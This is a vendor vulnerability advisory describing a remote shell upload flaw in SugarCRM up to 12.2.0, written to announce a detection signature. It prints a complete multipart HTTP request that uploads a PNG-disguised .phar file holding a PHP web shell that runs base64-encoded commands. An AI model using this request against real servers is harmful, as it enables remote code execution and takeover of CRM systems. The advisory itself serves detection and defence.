Application Details
SugarCRM is an open source customer relationship management suite.
Vulnerability
SugarCRM versions up to 12.2.0 suffer from a remote shell upload vulnerability. SugarCRM could allow a remote authenticated attacker to execute arbitrary code on the system, caused by improper input validation.
Identification
By sending a specially crafted request, using the EmailTemplates, an attacker could exploit this vulnerability to execute arbitrary PHP code on the system.
POST /index.php HTTP/1.1
Host: 192.168.74.130:8080
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 577
Content-Type: multipart/form-data; boundary=24dca17724a5bf7732b724ccdaa83abd
--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="module"
EmailTemplates
--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="action"
AttachFiles
--24dca17724a5bf7732b724ccdaa83abd
Content-Disposition: form-data; name="file"; filename="sweet.phar"
Content-Type: image/png
.PNG
.
...
IHDR.............O.f....KPLTE<?php echo "#####"; passthru(base64_decode($_POST["c"])); echo "#####"; ?> ..x7... pHYs..........+.....*IDAT(.c`.
...YX..98..yx......ED..%.h..C...0..-L.Z.....IEND.B`.
--24dca17724a5bf7732b724ccdaa83abd--
Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary code on the system.
Coverage
Idappcom has created signature 8023455 along with a traffic file for this vulnerability.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
Comments